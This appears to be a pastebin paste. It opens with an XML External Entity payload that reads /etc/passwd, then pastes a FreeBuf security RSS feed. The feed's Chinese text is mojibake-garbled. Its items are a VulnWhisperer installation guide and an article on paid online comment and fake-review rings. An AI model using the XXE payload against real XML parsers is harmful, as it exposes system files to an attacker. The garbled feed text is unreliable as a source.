· 8 years ago · Jul 26, 2018, 08:40 AM
1<?xml version="1.0" encoding="UTF-8"?>
2<!DOCTYPE root [
3<!ELEMENT root ANY>
4<!ENTITY data SYSTEM '/etc/passwd'>
5]>
6<root><user>&data;</user></root>
7<rss version="2.0"
8 xmlns:content="http://purl.org/rss/1.0/modules/content/"
9 xmlns:wfw="http://wellformedweb.org/CommentAPI/"
10 xmlns:dc="http://purl.org/dc/elements/1.1/"
11 xmlns:atom="http://www.w3.org/2005/Atom"
12 xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
13 xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
14 >
15
16<channel>
17 <title>FreeBuf互è”ç½‘å®‰å…¨æ–°åª’ä½“å¹³å° | 关注黑客与æžå®¢</title>
18 <atom:link href="http://www.freebuf.com/feed" rel="self" type="application/rss+xml" />
19 <link>http://www.freebuf.com</link>
20 <description></description>
21 <lastBuildDate>Thu, 26 Jul 2018 08:02:47 +0000</lastBuildDate>
22 <language>zh-CN</language>
23 <sy:updatePeriod>hourly</sy:updatePeriod>
24 <sy:updateFrequency>1</sy:updateFrequency>
25
26 <item>
27 <title>VulnWhisperer:数æ®å¯è¢«ElasticSearchç´¢å¼•çš„æ¼æ´žæ•°æ®åŠæŠ¥å‘Šæ•´åˆå·¥å…·</title>
28 <link>http://www.freebuf.com/sectool/177189.html</link>
29 <comments>http://www.freebuf.com/sectool/177189.html#comments</comments>
30 <pubDate>Thu, 26 Jul 2018 07:00:45 +0000</pubDate>
31 <dc:creator>secist</dc:creator>
32 <category><![CDATA[工具]]></category>
33 <category><![CDATA[Logstash]]></category>
34 <category><![CDATA[æ¼æ´ž]]></category>
35
36 <guid isPermaLink="false">http://www.freebuf.com/?p=177189</guid>
37 <description><![CDATA[VulnWhispereræ˜¯ä¸€ä¸ªæ¼æ´žæ•°æ®å’ŒæŠ¥å‘Šçš„æ•´åˆå·¥å…·ã€‚VulnWhisperer会æå–所有报告并创建一个具有唯一文件å的文件,然åŽå°†å…¶å‘é€ç»™logstash。Logstash则会从文件å䏿喿•°æ®æ ‡è®°æŠ¥å‘Šä¸çš„æ‰€æœ‰ä¿¡æ¯ï¼ˆè¯·å‚阅logstash_vulnwhisp.conf文件),并最终将数æ®å‘é€åˆ°elasticsearch进行索引。 当剿”¯æŒ æ¼æ´žæ¡†æž¶ï¼š Nessus (v6 & v7) Qualys Web Applications Qualys Vulnerability Management OpenVAS Tenable.io Nexposeï¼ˆæš‚ä¸æ”¯æŒï¼‰ Insight VMï¼ˆæš‚ä¸æ”¯æŒï¼‰ NMAPï¼ˆæš‚ä¸æ”¯æŒï¼‰ 更多 å®‰è£…åŠæ“作概è¦ï¼š 1.ä¸¥æ ¼éµå¾ªå®‰è£…è¦æ±‚。 2.在example.ini文件ä¸å¡«å†™ä½ è¦å¤„ç†çš„部分。 3.修改logstash文件ä¸çš„IP,并将它们导入到logstash conf目录(默认为/etc/logstash/conf.d/)。 4.导入kibanaå¯è§†åŒ–。 5.è¿è¡ŒVulnwhisperer。 安装环境 1.ElasticStack 5.x 2.Python 2.7 3.æ¼æ´žæ‰«æå™¨ å¯é€‰ï¼šMessage broker 例如Kafka或RabbitMQ VulnWhisperer安装(å¯èƒ½éœ€è¦sudo) 首先,我们需è¦å®‰è£…å…¶ä¾èµ–项: sudo apt-get install zlib1g-dev libxml2-dev libxslt1-dev 接ç€ï¼Œæˆ‘们安装ä¾èµ–模å—: cd deps/qualysapi python setup.py install 最åŽï¼Œå®‰è£…VulnWhisperer: pip install -r /path/to/VulnWhisperer/requirements.txt cd /path/to/VulnWhisperer python setup.py install ELK节点安装示例 å¦‚æžœä½ æ²¡æœ‰çŽ°æˆçš„ELK集群/èŠ‚ç‚¹ï¼Œä»¥ä¸‹å°†ä¸ºä½ æä¾›åœ¨Debian上的Elasticsearch&Kibana独立节点的安装指å—。  请注æ„,还有一个docker-compose.yml文件也å¯ç”¨ã€‚ Debian: https://www.elastic.co/guide/en/elasticsearch/reference/5.6/deb.html sudo apt-get install -y default-jre wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add - sudo apt-get install apt-transport-https echo "deb https://artifacts.elastic.co/packages/5.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-5.x.list sudo apt-get update && sudo apt-get install elasticsearch kibana […]]]></description>
38 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);">VulnWhispereræ˜¯ä¸€ä¸ªæ¼æ´žæ•°æ®å’ŒæŠ¥å‘Šçš„æ•´åˆå·¥å…·ã€‚VulnWhisperer会æå–所有报告并创建一个具有唯一文件å的文件,然åŽå°†å…¶å‘é€ç»™logstash。Logstash则会从文件å䏿喿•°æ®æ ‡è®°æŠ¥å‘Šä¸çš„æ‰€æœ‰ä¿¡æ¯ï¼ˆè¯·å‚阅logstash_vulnwhisp.conf文件),并最终将数æ®å‘é€åˆ°elasticsearch进行索引。</b> </p>
39<p><b style="color: rgb(0, 176, 80);"><img alt="vuln_whisperer_logo_s.png" src="http://image.3001.net/images/20180711/15312626245927.png!small" width="690" height="621"></b></p>
40<h2>当剿”¯æŒ</h2>
41<h3><strong>æ¼æ´žæ¡†æž¶ï¼š</strong></h3>
42<p><a href="https://www.tenable.com/products/nessus/nessus-professional" ref="">Nessus (v6 & <strong>v7</strong>)</a></p>
43<p><a href="https://www.qualys.com/apps/web-app-scanning/">Qualys Web Applications</a></p>
44<p><a href="https://www.qualys.com/apps/vulnerability-management/">Qualys Vulnerability Management</a></p>
45<p><a href="http://www.openvas.org/">OpenVAS</a></p>
46<p><a href="https://www.tenable.com/products/tenable-io">Tenable.io</a></p>
47<p><a href="https://www.rapid7.com/products/nexpose/">Nexpose</a><span style="color: rgb(51, 51, 51);">ï¼ˆæš‚ä¸æ”¯æŒï¼‰</span></p>
48<p><a href="https://www.rapid7.com/products/insightvm/">Insight VM</a><span style="color: rgb(51, 51, 51);">ï¼ˆæš‚ä¸æ”¯æŒï¼‰</span></p>
49<p><a href="https://nmap.org/">NMAP</a><span style="color: rgb(51, 51, 51);">ï¼ˆæš‚ä¸æ”¯æŒï¼‰</span></p>
50<p>更多</p>
51<h2>å®‰è£…åŠæ“作概è¦ï¼š</h2>
52<p>1.ä¸¥æ ¼éµå¾ªå®‰è£…è¦æ±‚。</p>
53<p>2.在<a href="https://github.com/austin-taylor/VulnWhisperer/blob/master/configs/frameworks_example.ini">example.ini</a><span style="color: rgb(51, 51, 51); font-size: 16px;">文件ä¸å¡«å†™ä½ è¦å¤„ç†çš„部分。</span></p>
54<p>3.修改<a href="https://github.com/austin-taylor/VulnWhisperer/tree/master/logstash">logstash文件</a><span style="color: rgb(51, 51, 51); font-size: 16px;">ä¸çš„IP,并将它们导入到logstash conf目录(默认为/etc/logstash/conf.d/)。</span></p>
55<p>4.导入<a href="https://github.com/austin-taylor/VulnWhisperer/tree/master/kibana/vuln_whisp_kibana">kibanaå¯è§†åŒ–</a>。</p>
56<p>5.è¿è¡Œ<a href="https://github.com/austin-taylor/VulnWhisperer#run">Vulnwhisperer</a>。</p>
57<h3><strong>安装环境</strong></h3>
58<p>1.ElasticStack 5.x</p>
59<p>2.Python 2.7</p>
60<p>3.æ¼æ´žæ‰«æå™¨</p>
61<p>å¯é€‰ï¼šMessage broker 例如Kafka或RabbitMQ</p>
62<h3><strong>VulnWhisperer安装(å¯èƒ½éœ€è¦sudo)</strong></h3>
63<p>首先,我们需è¦å®‰è£…å…¶ä¾èµ–项:</p>
64<pre><code>sudo apt-get install zlib1g-dev libxml2-dev libxslt1-dev </code></pre>
65<p>接ç€ï¼Œæˆ‘们安装ä¾èµ–模å—:</p>
66<pre><code>cd deps/qualysapi
67python setup.py install</code></pre>
68<p>最åŽï¼Œå®‰è£…VulnWhisperer:</p>
69<pre><code>pip install -r /path/to/VulnWhisperer/requirements.txt
70cd /path/to/VulnWhisperer
71python setup.py install</code></pre>
72<h3><strong>ELK节点安装示例</strong></h3>
73<p>å¦‚æžœä½ æ²¡æœ‰çŽ°æˆçš„ELK集群/èŠ‚ç‚¹ï¼Œä»¥ä¸‹å°†ä¸ºä½ æä¾›åœ¨Debian上的Elasticsearch&Kibana独立节点的安装指å—。 </p>
74<p>请注æ„,还有一个docker-compose.yml文件也å¯ç”¨ã€‚</p>
75<p><strong>Debian:</strong> <a href="https://www.elastic.co/guide/en/elasticsearch/reference/5.6/deb.html">https://www.elastic.co/guide/en/elasticsearch/reference/5.6/deb.html</a></p>
76<pre><code>sudo apt-get install -y default-jre
77wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
78sudo apt-get install apt-transport-https
79echo "deb https://artifacts.elastic.co/packages/5.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-5.x.list
80sudo apt-get update && sudo apt-get install elasticsearch kibana logstash
81sudo /bin/systemctl daemon-reload
82sudo /bin/systemctl enable elasticsearch.service
83sudo /bin/systemctl enable kibana.service
84sudo /bin/systemctl enable logstash.service</code></pre>
85<h3><strong>Elasticsearch&Kibanaé…置示例</strong></h3>
86<p><b>ä½¿ç”¨ä½ å–œæ¬¢çš„æ–‡æœ¬ç¼–è¾‘å™¨</b></p>
87<p>获å–主机IP,更改etc /elasticsearch/elasticsearch.yml文件ä¸çš„IP。(默认为’localhost’)</p>
88<p>验è¯Elasticsearch是å¦åœ¨ç«¯å£9200上è¿è¡Œã€‚(默认)</p>
89<p>获å–主机IP,更改/etc/kibana/kibana.yml文件ä¸çš„IP(默认为’localhost’)。验è¯Kibanaæ˜¯å¦æŒ‡å‘æ£ç¡®çš„Elasticsearch IP。(这是在上一æ¥ä¸è®¾ç½®çš„)</p>
90<p>验è¯Kibana是å¦åœ¨ç«¯å£5601上è¿è¡Œã€‚(默认)</p>
91<p>å¯åЍelasticsearch,验è¯å®ƒä»¬æ˜¯å¦æ£åœ¨è¿è¡Œ/相互通信:</p>
92<pre><code>sudo service elasticsearch start
93sudo service kibana start</code></pre>
94<p>或</p>
95<pre><code>sudo systemctl start elasticsearch.service
96sudo systemctl start kibana.service</code></pre>
97<h3><strong>Logstashé…置说明示例</strong></h3>
98<p>å°†/VulnWhisperer/logstash/ä¸çš„Logstash .conf文件,å¤åˆ¶æˆ–移动到/etc/logstash/conf.d/</p>
99<p>验è¯Logstash.conf文件输入,是å¦å·²åœ¨input.file.path目录ä¸åŒ…å«äº†VulnWhisper Scansçš„æ£ç¡®ä½ç½®ï¼š</p>
100<pre><code>input {
101 file {
102 path => "/opt/vulnwhisperer/nessus/**/*"
103 start_position => "beginning"
104 tags => "nessus"
105 type => "nessus"
106 }
107}</code></pre>
108<p>验è¯Logstash.conf文件输出,是å¦å·²åŒ…å«äº†ä¸Šä¸€æ¥ä¸æ£ç¡®çš„Elasticsearch IP设置(默认为localhost):</p>
109<pre><code>output {
110 if "nessus" in [tags] or [type] == "nessus" {
111 #stdout { codec => rubydebug }
112 elasticsearch {
113 hosts => [ "localhost:9200" ]
114 index => "logstash-vulnwhisperer-%{+YYYY.MM}"
115 }
116 }</code></pre>
117<p>验è¯logstash是å¦å·²å…·æœ‰æ£ç¡®çš„æ–‡ä»¶æƒé™ï¼Œå¯ä»¥è¯»å–VulnWhisperer Scansçš„ä½ç½®ã€‚</p>
118<p>é…置完æˆåŽè¿è¡ŒLogstash <img src='http://image.3001.net/images/index/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> 作为æœåŠ¡è¿è¡ŒLogstash将获å–/etc/logstash/conf.d/ä¸çš„æ‰€æœ‰æ–‡ä»¶ã€‚å¦‚æžœä½ åªæƒ³è¿è¡Œå•个logstash文件,请å‚考以下命令):</p>
119<p>作为æœåŠ¡è¿è¡ŒLogstash:</p>
120<pre><code>sudo service logstash start</code></pre>
121<p>或</p>
122<pre><code>sudo systemctl start logstash.service</code></pre>
123<p>å•个logstash文件:</p>
124<pre><code>sudo /usr/share/logstash/bin/logstash --path.settings /etc/logstash/ -f /etc/logstash/conf.d/1000_nessus_process_file.conf</code></pre>
125<h2><strong>é…ç½®</strong></h2>
126<h3>VulnWhispereré…置:</h3>
127<p>1.é…ç½®Ini文件</p>
128<p>2.设置Logstash文件</p>
129<p>3.导入ElasticSearch模æ¿</p>
130<p>4.导入Kibana仪表æ¿</p>
131<p><a href="https://github.com/austin-taylor/VulnWhisperer/blob/master/configs/frameworks_example.ini">frameworks_example.ini文件</a>:</p>
132<h2><img alt="config_example.png" src="http://image.3001.net/images/20180711/15312627434132.png!small" width="315" height="154"></h2>
133<h2>è¿è¡Œ</h2>
134<p>填写必è¦ä¿¡æ¯è‡³inié…ç½®æ–‡ä»¶ï¼Œç„¶åŽæ‰§è¡Œå¦‚下命令。</p>
135<pre><code>vuln_whisperer -c configs/frameworks_example.ini -s nessus
136or
137vuln_whisperer -c configs/frameworks_example.ini -s qualys</code></pre>
138<p><strong><img alt="running_vuln_whisperer.png" src="http://image.3001.net/images/20180711/15312627702433.png!small" width="690" height="119"></strong></p>
139<h3><strong>æ¯æ™šè¿è¡Œ</strong></h3>
140<p>å¦‚æžœä½ å½“å‰è¿è¡Œçš„系统为linux,请务必创建一个cronjobä»¥åˆ é™¤å˜å‚¨åœ¨æ•°æ®åº“ä¸çš„æ—§æ–‡ä»¶ã€‚å¦‚æžœä½ æ£åœ¨ä½¿ç”¨json,请务必更改.csv。</p>
141<p>使用以下设置创建用户级的crontab - å…¶è¡¨ç¤ºå°†åœ¨æ¯æ™šçš„0130è¿è¡Œvulnwhisperer:</p>
142<pre><code>00 1 * * * /usr/bin/find /opt/vulnwhisp/ -type f -name '*.csv' -ctime +3 -exec rm {} \;</code></pre>
143<pre><code>30 1 * * * /usr/local/bin/vuln_whisperer -c /opt/vulnwhisp/configs/example.ini</code></pre>
144<p>而对于Windowsç³»ç»Ÿï¼Œä½ å¯èƒ½éœ€è¦åœ¨bin目录ä¸çš„vulnWhispererä¸é”®å…¥äºŒè¿›åˆ¶æ–‡ä»¶çš„完整路径。</p>
145<h2>视频演示</h2>
146<p style="text-align: center;"><iframe frameborder="0" width="640" height="498" src="https://v.qq.com/iframe/player.html?vid=g0719imnhzm&tiny=0&auto=0"></iframe></p>
147<p><b style="color: rgb(159, 163, 168);">*å‚è€ƒæ¥æºï¼š<a href="https://github.com/austin-taylor/VulnWhisperer">GitHub</a>,FBå°ç¼– secist 编译,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
148]]></content:encoded>
149 <wfw:commentRss>http://www.freebuf.com/sectool/177189.html/feed</wfw:commentRss>
150 <slash:comments>0</slash:comments>
151 </item>
152 <item>
153 <title>èµ°è¿›èŒä¸šé”®ç›˜ä¾ çš„ä¸–ç•Œï¼Œä¹˜é£Žç ´æµªæ²¡æœ‰è°èƒ½é˜»æŒ¡çš„黑产江湖</title>
154 <link>http://www.freebuf.com/articles/network/178669.html</link>
155 <comments>http://www.freebuf.com/articles/network/178669.html#comments</comments>
156 <pubDate>Thu, 26 Jul 2018 05:50:26 +0000</pubDate>
157 <dc:creator>GEETESTæžéªŒ</dc:creator>
158 <category><![CDATA[网络安全]]></category>
159 <category><![CDATA[水军]]></category>
160 <category><![CDATA[网络黑产]]></category>
161
162 <guid isPermaLink="false">http://www.freebuf.com/?p=178669</guid>
163 <description><![CDATA[éšç€äº’è”网由web1.0å‘展到web2.0,互è”网第一批黑色产业链就诞生,而在这里é¢å°±æœ‰å¯å·ç§°â€œé»‘产活化石â€çš„网络水军队ä¼ã€‚ä»Šå¤©è®©æˆ‘ä»¬èµ°è¿›ä»–ä»¬çš„ä¸–ç•Œï¼Œä¹˜é£Žç ´æµªæ²¡æœ‰è°èƒ½é˜»æŒ¡çš„黑产江湖…… 演示视频 他们也曾网上冲浪,éšç€äº’è”网的è¿ä»£å˜è¿ï¼Œä»–们激战过天涯ã€çŒ«æ‰‘ã€è¥¿ç¥ 胡åŒï¼Œä¹Ÿæ›¾åœ¨åšå®¢ã€å¼€å¿ƒã€äººäººä¸ŠæŒ‡ç‚¹æ±Ÿå±±ï¼ŒåŽæ¥ä»–们转战微åšã€å¾®ä¿¡ã€ç”µå•†ã€‚ å¦‚ä»Šï¼Œä»–ä»¬å·²æ¸—é€æ•´ä¸ªäº’è”网世界,并且构建了一个庞大的黑色 â€œç”Ÿæ€â€ã€‚ æ— æ‰€ä¸èƒ½â€œäº”毛党†作为ä¸å›½äº’è”网的特色产物,èŒä¸šæˆ–åŠèŒä¸šçš„付费写手称为互è”网水军,而在这里é¢ï¼Œè§„æ¨¡æœ€ä¸ºåºžå¤§çš„è¦æ•°äº”毛党。 “五毛党â€åœ¨å¹¿ä¹‰ä¸Šï¼Œå¤šæŒ‡äº’è”网当ä¸ï¼Œä¸ºäº†é’±è€Œå޻呿Ÿä¸ªå¸–,é˜è¿°æŸä¸ªè§‚点的人。åˆå› 为最早的å‘帖者除底薪外,æ¯å¸–按五毛钱æ¥åŠ è–ªï¼Œè¢«ç½‘æ°‘æˆç§°ä¸ºâ€œäº”毛党â€ã€‚他们ä¹äºŽä¸ºä»˜è´¹äººå£«åœ¨äº’è”ç½‘ä¸ŠçŒæ°´ï¼ŒåŒ…括å‘帖ã€è¯„论ã€ä¼ æ’æµè¨€æˆ–è€…å¸¦æœ‰æŒ‡å‘æ€§çš„舆论信æ¯ç‰ç‰ã€‚ åŠ æ‹¿å¤§ç»´å¤šåˆ©äºšå¤§å¦çš„ç ”ç©¶äººå‘˜æ›¾è”åˆåŒ—京大å¦çš„å¦è€…å…±åŒå‘布了一项å为《Undercover Researchers Expose Chinese Internet Water Army》的报告,直指ä¸å›½ç½‘络水军: æŠ¥å‘Šä¸»è¦æœé›†äº†æ–°æµªã€æœç‹ä¸¤å®¶é—¨æˆ·ç½‘站的700个用户近20,000æ¡è¯„论数æ®ï¼Œå¹¶è¯•图区别“五毛党â€ä¸Žæ£å¸¸ç”¨æˆ·çš„区别。最终å‘现: â€œäº”æ¯›å…šâ€æ›´å€¾å‘于å‘è¡¨æ–°çš„è¯„è®ºï¼Œè€Œä¸æ˜¯å¯¹å…¶å®ƒè¯„论进行回å¤ã€‚å…¶ä¸ï¼Œè¶…过50%的人会间隔2.5分钟就会å‘一个新帖。与普æ£å¸¸ç”¨æˆ·ç›¸æ¯”ï¼Œä»–ä»¬ä¼šæ›´å¿«åœ°ä»Žè®¨è®ºä¸æŠ½èº«è€Œå‡ºï¼Œå¹¶å°†ID弃而ä¸ç”¨ã€‚而且,他们æ¯ä¸ªäººå‘布的内容也有很大ä¸åŒï¼Œè¿™äº›äººå¤§å¤šé€šè¿‡å‰ªè´´æ–¹å¼ï¼Œåå¤å‘表相åŒå†…容。调查人员å‘现,在新浪,æœç‹ç½‘站上,相似评论内容的é‡å¤çŽ‡é«˜è¾¾88%。 ç½‘ä¼ â€œäº”æ¯›å…šâ€å·¥èµ„æ¸…å• è€Œåœ¨â€œäº”æ¯›å…šâ€ä¸‹æ¸¸ï¼Œåˆæœ‰ä¼—å¤šåˆ†æ”¯ï¼ŒèƒŒåŽæ˜¯ä¸€æ¡ç”±æŽ¨æ‰‹ã€æžªæ‰‹ã€æ°´å†›ç»„æˆçš„庞大的利益链桅… æ®æ–°åŽç¤¾æŠ¥ï¼Œ2017å¹´5月以æ¥ï¼Œä¸åŽäººæ°‘共和国公安部部署å„地公安机关开展打击“网络水军â€å…¨å›½é›†ç¾¤æˆ˜å½¹ï¼Œå·²ç ´èŽ·â€œç½‘ç»œæ°´å†›â€è¿æ³•犯罪案件40余起,涉案总金é¢ä¸Šäº¿å…ƒï¼ŒæŠ“èŽ·è¿æ³•犯罪嫌疑人200ä½™äººï¼ŒæŸ¥èŽ·å¹¶å…³åœæ¶‰å«Œéžæ³•炒作的网络账å·5000余个,关é—è¿æ³•è¿è§„网站上万个,涉åŠç½‘ä¸Šæ¶æ„ç‚’ä½œä¿¡æ¯æ•°åƒä¸‡æ¡ã€‚ 然而,黑产世界何其之大,全国èŒä¸šæˆ–åŠèŒä¸šâ€œäº”毛党â€ä½•æ¢åƒä¸‡ï¼ 电商æ»ç©´â€œå·®è¯„å¸ˆâ€ å¦‚æžœå°†â€œäº”æ¯›å…šâ€æ¯”作网络水军人海战术般的野路å,那么èŒä¸šå·®è¯„师就是网络水军ä¸çš„特ç§å…µã€‚3-5人编制的èŒä¸šå·®è¯„å¸ˆï¼Œå‡ å¤©ä¸‹æ¥ç”šè‡³å¯ä»¥æžåž®ä¸€å®¶ç½‘红店@ èŒä¸šå·®è¯„师”æ“作æµç¨‹å›¾ 与“五毛党â€ä¸åŒï¼Œä»–ä»¬çš„ä¸šåŠ¡æ›´åŠ ç²¾å‡†ï¼Œå°±æ˜¯å·®è¯„ã€‚å› ä¸ºåšçš„就是电商的生æ„,所以这次淘å®ä¸Šè‚¯å®šæ˜¯æ‰¾ä¸åˆ°ä»–们的身影。他们体é‡åºžå¤§ï¼Œèµ·æ¥éƒ½æ˜¯è§„模达2000人的QQ群…… èŒä¸šå·®è¯„师“工作交æµç¾¤â€ 与其他黑产群ä¸åŒï¼Œè¿™ä¸ªå‡ 乎ä¸è®¾é—¨æ§›ï¼Œå¾ˆå®¹æ˜“就混进3个2000人群。但当Magiccc准备干活时,傻了眼: 群内全员ç¦è¨€ å¯èƒ½æ˜¯å¯Ÿè§‰åˆ°äº†ä»€ä¹ˆï¼Œå…¶ä»–å‡ ä¸ªç¾¤éƒ½æ˜¯ç¦è¨€çжæ€ã€‚没办法,åªè¦å¦æ‰¾è·¯åï¼ŒåŠ äº†ä¸ªâ€œèŒæ–°ç¾¤â€ï¼Œå¦è¾Ÿè¹Šå¾„…… 然而,没想到的是,这些群在临近æ£å¸¸ä¸Šçæ—下ç的点,开始活跃起楅… â€œèŒæ–°ç¾¤â€ä»¥è€å¸¦æ–° æ ¹æ®ç»éªŒï¼Œè¿™ç¾¤äººæåˆ°çš„“肉â€åº”该是行业暗è¯ã€‚群主“english nameâ€åœ¨çº¿ä¸ºæ–°äººåšå¼•导,è¯è¯´50元的入会费真心ä¸è´µ……(相较æŸäº›é»‘äº§åŠ¨è¾„å‡ ç™¾ä¸Šåƒçš„费用,èŒä¸šå·®è¯„师的门槛算良心价) èŒä¸šå·®è¯„师,把电商的店铺称为“肉â€ï¼Œä¸€èˆ¬éƒ½ä¼šé€‰æ‹©æ–°å¼€çš„网店,寻找网店å«â€œæ‰¾è‚‰åƒâ€ï¼Œæ–°å…¥è¡Œçš„差评师通过验è¯çš„æš—è¯é€šå¸¸ä¸ºâ€œæ±‚åƒè‚‰â€ã€‚在这个新人群里,群主表示这仅仅是一个准备群。 群主“english nameâ€åå¤è¡¨ç¤ºï¼Œâ€œä½ 们è¦ç”¨è„‘ï¼è¦ç”¨è„‘ï¼çœ‹çœ‹ç¾¤ç›¸å†Œé‡Œé¢çš„æµç¨‹å›¾ï¼Œåšå¥½å‡†å¤‡å†æ¥å«æˆ‘ï¼â€è€Œæ ¹æ®è¿™ä¸ªæµç¨‹å›¾æ¥çœ‹ï¼Œä¸€ä¸ªæ–°å…¥é—¨çš„“èŒä¸šå·®è¯„师â€é¦–å…ˆè¦å‡†å¤‡æ‰“猎用的“枪â€ï¼šä¸€ä¸ªä¸è®°å的手机å¡ï¼ˆé»‘å¡ï¼‰ã€ä¸€ä¸ªå‡çš„身份è¯ï¼ˆä¹Ÿèƒ½å¼„到真的),然åŽé€šè¿‡è¿™ä¸ªå‡çš„身份è¯ï¼ŒåŽ»æ·˜å®æ³¨å†Œæ”¯ä»˜å®å’Œè´¦æˆ·ã€‚ 没有手机å¡ä¸è¦ç´§ï¼Œç¾¤ä¸»æé†’å…¥é—¨è€…åŽ»æŒ‡å®šæ¸ é“è´ä¹°ï¼›æ²¡æœ‰å‡èº«ä»½è¯ä¸è¦ç´§ï¼Œåªéœ€è¦åœ¨ç¾¤ä¸»å¤„缴纳50元的入门费,就å¯ä»¥å¾—到一串身份è¯å·ã€‚æœåŠ¡å¯è°“是细致入微,教å¦è´¨é‡å¯æƒ³è€ŒçŸ¥…… 这群人都是昼ä¼å¤œå‡ºï¼Œèµ„深差评师一般都是å•干,当然å¶å°”ä¹Ÿä¼šå¸¦ç€æ–°äººâ€œåˆ·ä»»åŠ¡â€ã€‚ 而这时候,å¦å¤–接任务的åƒäººç¾¤ä¹Ÿå¼€å§‹æ´»è·ƒèµ·æ¥ï¼š ä¸šåŠ¡ç¾¤å¼€å§‹æŽ¥å• è€Œåœ¨ç™½å¤©ï¼Œæœ‰å‡ ä¸ªç¾¤ä¸»è¯•æŽ¢æ€§çš„æ‰¾åˆ°MagicccèŠäº†ä¸‹ï¼Œè¡Œæƒ…å·®ä¸å¤šåœ¨15元到20元之间,当然å¯èƒ½è¿˜æœ‰æ›´ä½Žçš„。 å¦å¤–ä¸€ä¸ªâ€œèŒæ–°ç¾¤â€ï¼ŒMagiccc很快跟一ä½èµ„æ·±èŒä¸šå·®è¯„师混熟,这ä½è€å¸ˆå‚…表示“æ¯å¤©æ™šä¸Š10点,他会通过YYè¯éŸ³ç‚¹å,11点æ£å¼å¼€å§‹å¸¦æ–°äººåƒè‚‰â€ã€‚åŽæ¥è·Ÿè€å¸ˆå‚…èŠå¼€äº†ï¼Œä»–表示,他们手上有éžå¸¸å¤šçš„åƒäººç¾¤ï¼Œçœ‹æˆ‘åŠå¤©æ²¡å›žæ¶ˆæ¯ï¼Œä»–还以为我ä¸ç›¸ä¿¡ï¼ˆåˆ«è¯´åƒäººç¾¤äº†ï¼Œä½ 就说是万人群我都信)…… è€å¸ˆè¿˜è¡¨ç¤ºï¼Œåœ¨åƒäººç¾¤é‡Œï¼Œè°ˆåˆ¤æ‰‹æŽ¥åˆ°é¡¹ç›®åŽï¼Œä¼šæŠŠé’±ç›´æŽ¥è½¬å…¥å¤§å®¶çš„æ‹å·æ”¯ä»˜å®ä¸ã€‚一å•15å…ƒï¼Œæ¯æ™šéšä¾¿æŽ¥ä¸ª10å•,就是150å…ƒï¼Œåƒæˆ‘è¿™æ ·çš„â€œèŒæ–°â€å…¥è¡Œæœˆå…¥4500å…ƒä¸æˆé—®é¢˜ï¼è€Œèµ„æ·±å·®è¯„å¸ˆï¼Œæ›´æ˜¯è½»æ¾æœˆæ”¶å…¥ä¸Šä¸‡…… 水深难防,电商平å°è‹¦ä¸å ªè¨€ 我们都知é“ï¼Œæ·˜å®æžè¿‡èŒä¸šå·®è¯„师æ›å…‰å¹³å°ï¼Œä½†æ˜¯å› 为éšç§é—®é¢˜ï¼Œäº‰è®®ä¸æ–ï¼ŒåŽæ¥ä¹Ÿä¸äº†äº†ä¹‹ã€‚而这之åŽï¼Œè¿™ç¾¤äººæ›´åŠ æœ‰æƒæ— æï¼ 曾ç»çš„å·®è¯„å¸ˆæŸ¥è¯¢å¹³å° è€ŒçŽ°åœ¨ï¼Œç”µå•†å¹³å°çš„å–家,åªèƒ½é€šè¿‡æ·˜æŸ¥æŸ¥ã€æŸ¥å°å·ç‰ä¸€äº›åœ¨çº¿ä»˜è´¹å¹³å°è¿›è¡Œä¹°å®¶ä¿¡èª‰åˆ†æŸ¥è¯¢ã€‚ç„¶åŽï¼Œé€šè¿‡è¿™äº›ä¿¡æ¯åˆ¤æ–买家身份,至于效果如何,就ä¸å¾—而知了。 第三方查询å‚è€ƒä¿¡æ¯ å•从信誉级别æ¥çœ‹ï¼Œè¿™ä¸ªè¢«å°å·çš„èŒä¸šå·®è¯„师账å·å¯ä»¥è¯´éžå¸¸éšè”½ï¼Œ97.66%的好评率能够骗过ä¸å°‘电商å–家。 Magiccc认为,这些网络水军所谓的利益链金å—塔尖,背åŽéƒ½æ˜¯å“ªäº›äººã€‚è¡Œä¸šçš„æ¶æ€§ç«žäº‰ï¼Œä¸€æ–¹é¢é€šè¿‡æ³•å¾‹ä¸¥åŠ ç®¡æŽ§ï¼Œçº¦æŸä¼ä¸šï¼Œå¦å¤–针对水军ä¸çš„â€œå›¢é•¿â€æˆ–“水æ¯â€è¿™ç±»ç®¡ç†äººå‘˜ï¼Œä¹Ÿéœ€è¦ä¸¥æ ¼æ‰“击。 å¦å¤–一方é¢ï¼Œç›®å‰è¡Œä¸šç±»éžå¸¸å¤šçš„安全æœåŠ¡å•†ä¹Ÿå·²å…·å¤‡æˆç†Ÿçš„忬ºè¯ˆé£ŽæŽ§äº§å“以åŠè§£å†³æ–¹æ¡ˆã€‚基于海é‡ç”¨æˆ·æ•°æ®ï¼Œåˆ©ç”¨äººå·¥æ™ºèƒ½æŠ€æœ¯ï¼Œæå»ºè¡Œä¸ºæ¨¡åž‹å¹¶é€šè¿‡å›¢ä¼™å‘现,将业务安全风险扼æ€åœ¨æ‘‡ç¯®ä¸ï¼Œä»Žè€Œæå«ä¼ä¸šç½‘络资产,维护网络æ£å¸¸ç§©åºã€‚ *本文作者:GEETESTæžéªŒï¼Œè½¬è½½è¯·æ³¨æ˜Žæ¥è‡ªFreeBuf.COM]]></description>
164 <content:encoded><![CDATA[<h3><img alt="6a5e5471gy1fj4c08wofnj20s80hz7o9.jpg" src="http://image.3001.net/images/20180724/15324370266234.jpg!small" width="690" height="387"></h3>
165<h3><b style="color: rgb(0, 176, 80);">éšç€äº’è”网由web1.0å‘展到web2.0,互è”网第一批黑色产业链就诞生,而在这里é¢å°±æœ‰å¯å·ç§°â€œé»‘产活化石â€çš„网络水军队ä¼ã€‚ä»Šå¤©è®©æˆ‘ä»¬èµ°è¿›ä»–ä»¬çš„ä¸–ç•Œï¼Œä¹˜é£Žç ´æµªæ²¡æœ‰è°èƒ½é˜»æŒ¡çš„黑产江湖……</b></h3>
166<h2>演示视频</h2>
167<p style="text-align: center;"><iframe frameborder="0" width="640" height="498" src="https://v.qq.com/iframe/player.html?vid=j1344cjut73&tiny=0&auto=0"></iframe></p>
